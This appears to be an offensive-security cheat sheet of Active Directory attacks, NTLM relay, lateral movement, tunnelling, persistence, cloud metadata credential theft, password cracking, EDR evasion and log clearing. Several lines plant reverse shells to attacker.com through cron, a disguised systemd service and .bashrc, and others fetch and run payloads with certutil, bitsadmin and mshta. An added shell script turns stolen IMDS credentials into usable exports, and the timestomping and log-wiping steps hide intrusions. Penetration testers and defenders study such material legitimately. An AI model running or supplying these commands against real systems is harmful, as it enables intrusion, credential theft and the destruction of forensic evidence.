certipy req -u user@target.com -p 'password' -dc-ip dc-ip -target ca.target.com -ca 'CA-NAME' -template VulnTemplate -upn administrator@target.com
certipy auth -pfx administrator.pfx -domain target.com -dc-ip dc-ip

ESC8: relay DC NTLM auth to AD CS HTTP endpoint — get DC certificate
certipy relay -target ca.target.com -template DomainController
# Trigger auth with PetitPotam:
python3 PetitPotam.py -u user -p password attacker.com dc.target.com
Then run certipy auth with the saved .pfx to get the DC machine account's TGT and NT hash, which is enough for DCSync

Abuse ACL edges from BloodHound — WriteDACL/GenericAll are direct paths to DA
# Add DCSync rights to user via WriteDACL on domain object (PowerView):
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity owned-user -Rights DCSync
# GenericAll (or ForceChangePassword) on a user lets you reset its password without knowing the old one:
Set-DomainUserPassword -Identity target-user -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)

Abuse S4U2Proxy to impersonate any user to allowed services
# Find accounts with constrained delegation:
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto
# Request ST for alternative user (S4U2Self + S4U2Proxy):
impacket-getST -spn 'cifs/target.domain.com' -impersonate Administrator 'domain/svc-account:password'
export KRB5CCNAME=Administrator@cifs_target.domain.com@DOMAIN.COM.ccache # getST prints the exact filename it saved
impacket-psexec -k -no-pass target.domain.com
Users marked "Account is sensitive and cannot be delegated" or in Protected Users cannot be impersonated this way

Relay NTLM auth to SMB signing-disabled hosts — works on flat networks
# Disable SMB/HTTP in Responder.conf first, then:
responder -I eth0 -rdw
impacket-ntlmrelayx -tf relay-targets.txt -smb2support -i # interactive shell
# Or dump SAM on relay targets:
impacket-ntlmrelayx -tf relay-targets.txt -smb2support
Use --gen-relay-list with nxc to find SMB signing disabled targets first
Remote SYSTEM shell via SMB service — creates a noisy service entry
impacket-psexec 'domain/user:password@target.com'
impacket-psexec -hashes ':NTLM' 'domain/administrator@target.com'
Drops a binary on ADMIN$ and creates a service (random name with impacket, PSEXESVC with the Sysinternals tool); detected by most EDR. Use wmiexec for stealth

Remote execution via WMI — no service created, semi-interactive shell
impacket-wmiexec 'domain/user:password@target.com'
impacket-wmiexec -hashes ':NTLM' 'domain/administrator@target.com' "cmd.exe /c whoami"

Full interactive PowerShell over WinRM — supports upload/download/load
evil-winrm -i target.com -u administrator -p 'password'
evil-winrm -i target.com -u administrator -H NTLM_HASH
evil-winrm -i target.com -u administrator -p 'password' -S # SSL (5986)

Execute commands over SMB or WinRM — supports PTH with -H flag
nxc smb target.com -u admin -p 'password' -x "whoami"
nxc smb target.com -u admin -p 'password' -X "Get-Process" # PowerShell
nxc winrm target.com -u admin -p 'password' -x "whoami"

Reach internal services through SSH jump hosts via local port forwarding
# Forward local port to internal RDP through jump host:
ssh -L 3389:internal-rdp:3389 user@jumphost -N
# Then: rdesktop localhost:3389
# Multi-hop:
ssh -J user@hop1 user@hop2

SOCKS5 proxy through SSH — route any tool through the tunnel with proxychains
ssh -D 1080 user@jumphost -N
# Use with proxychains:
proxychains nmap -sT -Pn -p 80,443,445,3389 internal-host
proxychains evil-winrm -i internal-target -u admin -H HASH
Only full TCP connects pass through SOCKS, hence -sT and -Pn (no SYN scan, no ICMP/ARP host discovery); UDP tools and raw-socket scans will not work through this tunnel

HTTP-based tunnel — works through web proxies and egress rules that only allow outbound HTTP(S)
# Attacker (server):
./chisel server -p 8080 --reverse
# Victim (client):
./chisel client attacker.com:8080 R:socks
# Single port forward:
./chisel client attacker.com:8080 R:3389:127.0.0.1:3389
# proxychains config: socks5 127.0.0.1 1080

Layer 3 tunnel — use standard tools (nmap, nxc) without proxychains
# Attacker (proxy):
./proxy -selfcert -laddr 0.0.0.0:11601
# Victim (agent):
./agent -connect attacker.com:11601 -ignore-cert
# In ligolo console:
session → start
# Add route on attacker:
sudo ip route add 192.168.2.0/24 dev ligolo
Older ligolo-ng releases need the tun interface created before start (sudo ip tuntap add user $USER mode tun ligolo, then sudo ip link set ligolo up); newer ones create it from the console. Currently the go-to pivoting tool: no proxychains needed, TCP and UDP are routed through the interface, so nmap -sS and UDP scans work as usual

DCOM execution — less noisy than PSExec, uses DCOM interface on port 135
# PowerShell — MMC20.Application:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","target.com"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\Temp\out.txt","7")
# impacket:
impacket-dcomexec 'domain/user:password@target.com' 'cmd.exe /c whoami'

Cron calls back every 5 minutes — survives reboots
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'") | crontab -
# System-wide (root required):
echo "*/5 * * * * root /tmp/.update.sh" >> /etc/crontab

Persistent service that auto-restarts — survives reboots and killed sessions
cat > /etc/systemd/system/sysupdate.service << 'EOF'
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload && systemctl enable sysupdate --now

Backdoor SSH access with your public key — clean and reliable
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAA...your-public-key..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Fires whenever the user opens an interactive shell: low-privilege persistence that only triggers on logins
echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1 &' >> ~/.bashrc
echo 'nohup /tmp/.agent &' >> ~/.profile

Classic autorun — executes payload on every user login
# Current user (no admin needed):
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f
# All users (admin required):
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f

Scheduled task running as SYSTEM every 5 minutes — survives reboots
schtasks /create /sc MINUTE /mo 5 /tn "Windows Update Helper" /tr "C:\Windows\Temp\payload.exe" /ru SYSTEM /f
schtasks /query /tn "Windows Update Helper"
# Delete:
schtasks /delete /tn "Windows Update Helper" /f

Persistent service that auto-starts on boot — visible in services.msc
sc create SvcUpdate binPath= "C:\Windows\Temp\payload.exe" start= auto DisplayName= "Windows Service Update"
sc description SvcUpdate "Provides Windows update functionality."
sc start SvcUpdate
A plain EXE started this way must talk to the Service Control Manager or it is killed after about 30 s (error 1053); use a proper service binary, or a service-compatible payload such as msfvenom -f exe-service

Fileless WMI persistence — triggers about 2 min after boot; lives in the WMI repository, so there is no file or Run key to find
# PowerShell:
$FilterArgs = @{Name='UpdateFilter'; EventNameSpace='root\CimV2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120"}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
$ConsumerArgs = @{Name='UpdateConsumer'; CommandLineTemplate="C:\Windows\Temp\payload.exe"}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
$BindingArgs = @{Filter=$Filter; Consumer=$Consumer}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs
As written the filter matches on every 60 s poll once uptime passes 120 s, so the payload is relaunched repeatedly; add an upper bound (AND TargetInstance.SystemUpTime < 325) to fire once per boot. Stealthy: no obvious registry key or service entry, though Sysmon event IDs 19-21 log filter, consumer and binding creation
Establish who you are and what policies are attached — always run first
aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam list-groups-for-user --user-name <user>

Brute-force all API calls to find what permissions a key actually has
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
python3 enumerate-iam.py --access-key AKIA... --secret-key SECRET...
Generates hundreds of API calls — visible in CloudTrail

List and access S3 buckets — try --no-sign-request for unauthenticated access
# List buckets:
aws s3 ls
aws s3 ls s3://bucket-name --recursive
# Public bucket check:
aws s3 ls s3://bucket-name --no-sign-request
# Download entire bucket:
aws s3 sync s3://bucket-name ./local-dir --no-sign-request
# Tool:
s3scanner scan --buckets-file buckets.txt

From SSRF or code execution on EC2 — steal temporary IAM credentials
# IMDSv1 (no token required — misconfigured):
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
# IMDSv2 (token required):
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
IMDSv2 needs a PUT with a custom header and a TTL, which a GET-only SSRF cannot send; that is the point of enforcing it (HttpTokens=required). Stolen credentials: export AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN
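Added example, not from the original cheat sheet: a sed-only converter that turns the JSON returned by the security-credentials endpoint into the three export lines the AWS CLI needs, so it works on a foothold that has curl but no jq. The JSON embedded below is a constructed sample in the shape IMDS returns, not real credentials.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet.
# Converts the JSON that /latest/meta-data/iam/security-credentials/<role> returns
# into the three export lines the AWS CLI expects. sed-only so it also works
# on a foothold without jq. Credentials are temporary: check Expiration.

imds_to_exports() {
  # stdin: IMDS credential JSON; stdout: shell export lines
  json=$(cat)
  field() {
    # $1: JSON key; prints its string value (first match)
    printf '%s\n' "$json" | sed -n "s/.*\"$1\" *: *\"\([^\"]*\)\".*/\1/p" | head -n 1
  }
  printf 'export AWS_ACCESS_KEY_ID=%s\n' "$(field AccessKeyId)"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$(field SecretAccessKey)"
  printf 'export AWS_SESSION_TOKEN=%s\n' "$(field Token)"
  printf '# expires: %s\n' "$(field Expiration)"
}

# Constructed sample in the same shape IMDS returns (not real credentials)
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEY000001",
  "SecretAccessKey" : "exampleSecretKey0000000000000000000000000",
  "Token" : "IQoJexampleSessionToken",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

printf '%s' "$SAMPLE_CREDS" | imds_to_exports

# Live use (IMDSv2), then confirm which role you hold:
#   TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
#   ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
#   eval "$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE | imds_to_exports)"
#   aws sts get-caller-identity
```

The session token is mandatory: an ASIA key used without AWS_SESSION_TOKEN fails with InvalidClientTokenId, which is the usual reason "stolen IMDS creds don't work".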
Deep divePacu is the AWS exploitation framework — scans for all privesc paths
pip3 install pacu
pacu
# In Pacu console:
set_keys
run iam__enum_permissions
run iam__privesc_scan
run iam__bruteforce_permissions Dump secrets from Lambda env vars, SSM and Secrets Manager
# Lambda env vars:
aws lambda list-functions --query 'Functions[*].FunctionName'
aws lambda get-function-configuration --function-name FUNC-NAME | jq '.Environment'
# SSM Parameter Store:
aws ssm describe-parameters
aws ssm get-parameters-by-path --path "/" --recursive --with-decryption
# Secrets Manager:
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id SECRET-NAME

Check if CloudTrail is enabled and query your own activity log
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail-name>
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=<user> --max-results 50

Enumerate Azure subscriptions, resources and role assignments
az login --use-device-code
az account list --output table
az account get-access-token
# Resources:
az resource list --output table
# Role assignments:
az role assignment list --all --output table
# VMs:
az vm list --output table
az vm run-command invoke -g RG -n VM --command-id RunShellScript --scripts "whoami"

ROADtools dumps and visualises all Azure AD / Entra ID objects — users, groups, apps, SP
pip3 install roadrecon
roadrecon auth -u user@tenant.onmicrosoft.com -p 'password'
roadrecon gather
roadrecon gui # browse at http://localhost:5000

Steal managed identity token from metadata endpoint — no credentials needed
# From inside Azure VM/Function/Container:
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H Metadata:true
# Parse token, then:
curl -H "Authorization: Bearer $TOKEN" https://management.azure.com/subscriptions?api-version=2020-01-01

Enumerate GCP projects, IAM bindings, compute instances and SA keys
gcloud auth list
gcloud projects list
gcloud iam service-accounts list
gcloud compute instances list
# Check permissions:
gcloud projects get-iam-policy PROJECT-ID
# Service account keys:
gcloud iam service-accounts keys list --iam-account SA@PROJECT.iam.gserviceaccount.com

From SSRF on GCE/Cloud Run — steal service account OAuth2 token
# Full metadata:
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Service account token:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

Hunt for AWS/Azure/GCP keys committed to git repos — verified = actually valid
trufflehog github --org=targetorg --only-verified
trufflehog git file://. --only-verified
# Gitrob (broader search):
gitrob analyze targetorg

Always identify hash type before throwing compute at it
hashid '$2y$10$...'
hash-identifier
# hashcat example hashes reference:
# https://hashcat.net/wiki/doku.php?id=example_hashes

NTLM mode — add rules immediately, most passwords need mutations
hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Show cracked:
hashcat -m 1000 ntlm.hashes --show

NetNTLMv2 from Responder/mitm6 captures — mode 5600
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt -r best64.rule
NetNTLMv2 cannot be passed directly — must crack or relay

TGS-REP RC4 hashes from Kerberoasting — mode 13100
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r best64.rule --force

AS-REP roast hashes — mode 18200
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r best64.rule

Common hash mode reference — bcrypt is slow, adjust -w and expect hours
# bcrypt:
hashcat -m 3200 bcrypt.hashes /usr/share/wordlists/rockyou.txt
# MD5:
hashcat -m 0 md5.hashes /usr/share/wordlists/rockyou.txt
# SHA-256:
hashcat -m 1400 sha256.hashes /usr/share/wordlists/rockyou.txt
# SHA-512crypt (Linux shadow):
hashcat -m 1800 shadow.hashes /usr/share/wordlists/rockyou.txt

Rules mutate wordlist entries — capital first, append numbers, leet substitutions
# Best64 rule (fast, high hit rate):
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# OneRuleToRuleThemAll (high coverage):
hashcat -m 1000 hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
# Combinator (two wordlists merged):
hashcat -m 1000 hashes.txt -a 1 wordlist1.txt wordlist2.txt
OneRuleToRuleThemAll: github.com/NotSoSecure/password_cracking_rules

Mask attack targets predictable patterns — efficient when policy is known
# ?u=upper ?l=lower ?d=digit ?s=special ?a=all printable
# 8-char: upper + lower + digit:
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d
# Common pattern Password + 4 digits:
hashcat -m 1000 hashes.txt -a 3 Password?d?d?d?d
# Increment mode (try all lengths 6-10):
hashcat -m 1000 hashes.txt -a 3 --increment --increment-min 6 --increment-max 10 ?a?a?a?a?a?a?a?a?a?a

John for Linux shadow files — use unshadow to merge passwd + shadow first
# Unshadow and crack:
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt
john unshadowed.txt --show
# Directly:
john --format=sha512crypt shadow.txt --wordlist=rockyou.txt

Generate target-specific wordlists from the website — employees use company terms
# CeWL — scrape target website for relevant words:
cewl https://target.com -d 3 -m 6 -o target-wordlist.txt
cewl https://target.com -d 2 --email -o emails.txt
# Crunch — pattern-based generation:
crunch 8 12 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
# Combine with hashcat:
hashcat -m 1000 hashes.txt target-wordlist.txt -r best64.rule

Use built-in Windows binaries — less likely to trigger AV/EDR signatures
# File download (no PowerShell):
certutil -urlcache -split -f http://attacker.com/file.exe C:\Temp\file.exe
bitsadmin /transfer job /download /priority normal http://attacker.com/file C:\Temp\file
# Execution without cmd.exe:
wmic process call create "C:\Temp\payload.exe"
mshta http://attacker.com/payload.hta
# Encode command:
echo -n "cmd /c whoami" | base64 # Linux
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("whoami")) # PS
Reference: lolbas-project.github.io — full catalogue of signed Microsoft binaries

Slow scans stay under IDS/WAF thresholds — add jitter to avoid pattern detection
# Bash — random sleep between requests:
for ip in $(cat targets.txt); do
nmap -sV -p 80,443 $ip
sleep $((RANDOM % 30 + 10))
done
# Nuclei — rate limit + pause:
nuclei -l targets.txt -rate-limit 5 -bulk-size 5 -pause-after-first
# ffuf — delay between requests:
ffuf -w wordlist.txt -u https://target.com/FUZZ -p 0.5

Route traffic through Tor — each NEWNYM signal gets a new exit node
# /etc/proxychains4.conf:
# dynamic_chain
# proxy_dns
# socks5 127.0.0.1 9050
tor &
proxychains nmap -sT -Pn -p 80,443 target.com
proxychains curl https://target.com
# Rotate per request with Tor circuit control:
echo 'signal NEWNYM' | nc 127.0.0.1 9051
Tor exit nodes are publicly listed — serious ops use residential proxies instead

Prevent commands from persisting in bash history during engagement
# Disable history for current session:
unset HISTFILE
export HISTSIZE=0
# Clear existing:
history -c && history -w
cat /dev/null > ~/.bash_history
# More thorough:
ln -sf /dev/null ~/.bash_history
Other logs remain — see auth.log, syslog, auditd, /var/log/secure

Set file mtime/atime to blend in with system files and avoid forensic timeline
# Match timestamps from another file:
touch -r /bin/ls /tmp/payload.sh
# Set specific timestamp:
touch -t 202301011200.00 /tmp/payload.sh
# Verify:
stat /tmp/payload.sh

Modify all three Windows timestamps to match legitimate system files
$file = Get-Item "C:\Temp\payload.exe"
$file.CreationTime = "01/01/2021 12:00:00"
$file.LastWriteTime = "01/01/2021 12:00:00"
$file.LastAccessTime = "01/01/2021 12:00:00"
NTFS stores $STANDARD_INFORMATION and $FILE_NAME — only $SI is modified here

Know what is monitoring you before running noisy tools
# Don't: invoke-mimikatz, sekurlsa, lsass (string-matched by EDR)
# Do: use direct syscalls, process hollowing, or legitimate dump tools
# Check what AV/EDR is running:
Get-MpComputerStatus # Windows Defender
# findstr has no | alternation: space-separated strings are ORed
tasklist | findstr /i "defender sentinel crowdstrike cylance carbon"
# Check ETW providers (telemetry sources):
logman query providers | findstr /i "Microsoft-Windows-Threat"

Scanner default UAs are blocklisted — always override with a real browser string
# Use a real browser UA:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" https://target.com
# ffuf with legit UA:
ffuf -w wordlist.txt -u https://target.com/FUZZ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Add referrer to look organic:
curl -A "Mozilla/5.0..." -H "Referer: https://www.google.com/" https://target.com/page

Remove tools and clear logs on the way out — scope-dependent, agree with client
# Remove dropped files:
shred -u /tmp/linpeas.sh /tmp/payload.elf
# Clear auth logs (root required):
echo > /var/log/auth.log
echo > /var/log/secure
# Clear wtmp/lastlog (hides login history):
echo > /var/log/wtmp
echo > /var/log/lastlog
# Remove from /tmp and check cron:
crontab -r 2>/dev/null
ls -la /tmp/ /dev/shm/
Shred overwrites before delete — simple rm is recoverable. Always document what you cleaned

Clear Windows event logs and delete dropped binaries after engagement
# Delete tools:
del /f /q C:\Windows\Temp\wp.exe C:\Windows\Temp\mimikatz.exe
# Clear event logs:
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# PowerShell:
Get-EventLog -List | ForEach-Object { Clear-EventLog $_.Log }
# Remove prefetch (execution traces):
del /f /q C:\Windows\Prefetch\PAYLOAD*
Log clearing itself generates event ID 1102 (Security) and 104 (System)